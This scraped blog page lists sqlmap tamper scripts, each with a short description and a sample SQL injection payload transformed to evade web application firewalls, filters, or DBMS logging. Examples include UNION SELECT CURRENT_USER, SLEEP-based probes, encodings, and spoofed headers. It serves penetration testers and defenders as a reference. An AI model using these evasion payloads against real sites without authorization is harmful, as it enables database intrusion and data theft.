SQLMap Tamper Scripts Update

apostrophemask.py

Replaces apostrophe character with its UTF-8 full width counterpart

'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

apostrophenullencode.py

Replaces apostrophe character with its illegal double unicode counterpart

'1 AND %271%27=%271'

appendnullbyte.py

Appends encoded NULL byte character at the end of payload

'1 AND 1=1'

base64encode.py

Base64 all characters in a given payload

'MScgQU5EIFNMRUVQKDUpIw=='

between.py

Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'

'1 AND A NOT BETWEEN 0 AND B--'

bluecoat.py

Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator

'SELECT%09id FROM users where id LIKE 1'

chardoubleencode.py

Double url-encodes all characters in a given payload (not processing already encoded)

'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

commalesslimit.py

Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'

''LIMIT 3 OFFSET 2''

commalessmid.py

Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'

'MID(VERSION() FROM 1 FOR 1)'

concat2concatws.py

Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'

'CONCAT_WS(MID(CHAR(0),0,0),1,2)'

charencode.py

Url-encodes all characters in a given payload (not processing already encoded)

'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

charunicodeencode.py

Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)

'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

equaltolike.py

Replaces all occurances of operator equal ('=') with operator 'LIKE'

'SELECT * FROM users WHERE id LIKE 1'

escapequotes.py

Slash escape quotes (' and ")

'1\\\\" AND SLEEP(5)#'

greatest.py

Replaces greater than operator ('>') with 'GREATEST' counterpart

'1 AND GREATEST(A,B+1)=A'

halfversionedmorekeywords.py

Adds versioned MySQL comment before each keyword

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

ifnull2ifisnull.py

Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'

'IF(ISNULL(1),2,1)'

modsecurityversioned.py

Embraces complete query with versioned comment

'1 /*!30874AND 2>1*/--'

modsecurityzeroversioned.py

Embraces complete query with zero-versioned comment

'1 /*!00000AND 2>1*/--'

multiplespaces.py

Adds multiple spaces around SQL keywords

'1 UNION SELECT foobar'

nonrecursivereplacement.py

Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters

'1 UNIOUNIONN SELESELECTCT 2--'

percentage.py

Adds a percentage sign ('%') infront of each character

'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M%T%A%B%L%E'

overlongutf8.py

Converts all characters in a given payload (not processing already encoded)

'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1'

randomcase.py

Replaces each keyword character with random case value

'INseRt'

randomcomments.py

Add random comments to SQL keywords

'I/**/N/**/SERT'

securesphere.py

Appends special crafted string

"1 AND 1=1 and '0having'='0having'"

sp_password.py

Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

'1 AND 9227=9227-- sp_password'

space2comment.py

Replaces space character (' ') with comments '/**/'

'SELECT/**/id/**/FROM/**/users'

space2dash.py

Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')

'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

space2hash.py

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

'1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'

space2morehash.py

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'

space2mssqlblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%0Eid%0DFROM%07users'

space2mssqlhash.py

Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')

'1%23%0AAND%23%0A9227=9227'

space2mysqlblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%A0id%0BFROM%0Cusers'

space2mysqldash.py

Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')

'1--%0AAND--%0A9227=9227'

space2plus.py

Replaces space character (' ') with plus ('+')

'SELECT+id+FROM+users'

space2randomblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%0Did%0DFROM%0Ausers'

symboliclogical.py

Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

"1 %26%26 '1'='1"

unionalltounion.py

Replaces UNION ALL SELECT with UNION SELECT

'-1 UNION SELECT'

unmagicquotes.py

Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)

'1%bf%27 AND 1=1-- '

uppercase.py

Replaces each keyword character with upper case value

'INSERT'

varnish.py

Append a HTTP header 'X-originating-IP'

http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366

versionedkeywords.py

Encloses each non-function keyword with versioned MySQL comment

'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

versionedmorekeywords.py

Encloses each keyword with versioned MySQL comment

'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'

xforwardedfor.py

Append a fake HTTP header 'X-Forwarded-For'

' headers["X-Forwarded-For"]'

via

SQLMap Tamper Scripts Update 04/July/2016的更多相关文章

  1. Sqlmap Tamper大全(1)

    sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...

  2. 安全工具推荐之sqlmap tamper&sqlmap api

    我发现总有一些人喜欢问sqlmap的tamper脚本,问完工具问参数,问完参数问脚本...... 你这个问题问的水平就很艺术,让我一时不知从何说起...... 说一下在sqlmap的使用过程中,个人了 ...

  3. sqlmap tamper脚本

    本文来自:SQLmap tamper脚本注释, 更新了一些脚本,<<不断更新中>> 目前已经总共有50+的脚本,故对源文章进行更新... sqlmap-master ls -l ...

  4. sqlmap Tamper脚本编写

    sqlmap Tamper脚本编写 前言 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, Postg ...

  5. Sqlmap Tamper大全

    sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...

  6. sqlmap tamper的使用

    前言 在早之前我对于tamper的使用一直都是停留在错误的思维.想着bypass,应该要先手动fuzz出规则来,然后再写成tamper使用. 直到今天,才察觉根本不需要一定要fuzz出具体的规则来,无 ...

  7. sqlmap tamper下模块的使用

    使用方法 根据实际情况,可以同时使用多个脚本,使用-v参数可以看到payload的变化. sqlmap.py -u "http://www.target.com/test.php?id=12 ...

  8. sqlmap tamper编写

    #!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.or ...

  9. sqlmap tamper绕过安全狗

    可以过5.3版本 放出py #!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (ht ...

随机推荐

  1. 负载均衡之LVS集群

    h3 { color: rgb(255, 255, 255); background-color: rgb(30,144,255); padding: 3px; margin: 10px 0px } ...

  2. iscroll5实现一个下拉刷新上拉加载的效果

    直接上代码!!! <!DOCTYPE html><html><head lang="en"> <meta charset="UT ...

  3. ipad和iphone的适配

    关于xib或者storybord下iphone的横竖屏的适配以及ipad的适配 ios8出现了Size Classes,解决了各种屏幕适配的问题,他把屏幕的宽和高分别分成了三种,把屏幕总共分成了九种情 ...

  4. 基于Python+Django的Kubernetes集群管理平台

    ➠更多技术干货请戳:听云博客 时至今日,接触kubernetes也有一段时间了,而我们的大部分业务也已经稳定地运行在不同规模的kubernetes集群上,不得不说,无论是从应用部署.迭代,还是从资源调 ...

  5. swift-分支

    swift相当于OC的比较 if后的括号可以省略 if后只能接bool值 if后的大括号不能省略 let num1 = 5.0 let num2 = 4.0 let boo :Bool = true ...

  6. Spring ApplicationContext 简解

    ApplicationContext是对BeanFactory的扩展,实现BeanFactory的所有功能,并添加了事件传播,国际化,资源文件处理等.   configure locations:(C ...

  7. 在双系统(Windows与Ubuntu)下删除Ubuntu启动项

    问题概述:因为在自己学习Linux的时候,按照网上的教程错误的删除了Ubuntu的一个内核驱动,导致Ubuntu不能启动.我想到的办法是重新安装系统,重装系统的第一步便是将Ubuntu从电脑中卸载.该 ...

  8. mongodb高级应用

    一.  高级查询 查询操作符 条件操作符:db.collection.find({"field":{$gt/$lt/$gte/$lte/$eq/$ne:value}}); 匹配所有 ...

  9. python爬虫学习(9) —— 一些工具和语法

    1. Beautiful Soup 在它的官网有这样一段话: You didn't write that awful page. You're just trying to get some data ...

  10. Maven :No goals have been specified for this build

    Maven报错 报错信息如下:No goals have been specified for this build 解决办法:在<build></build>标签中增加  & ...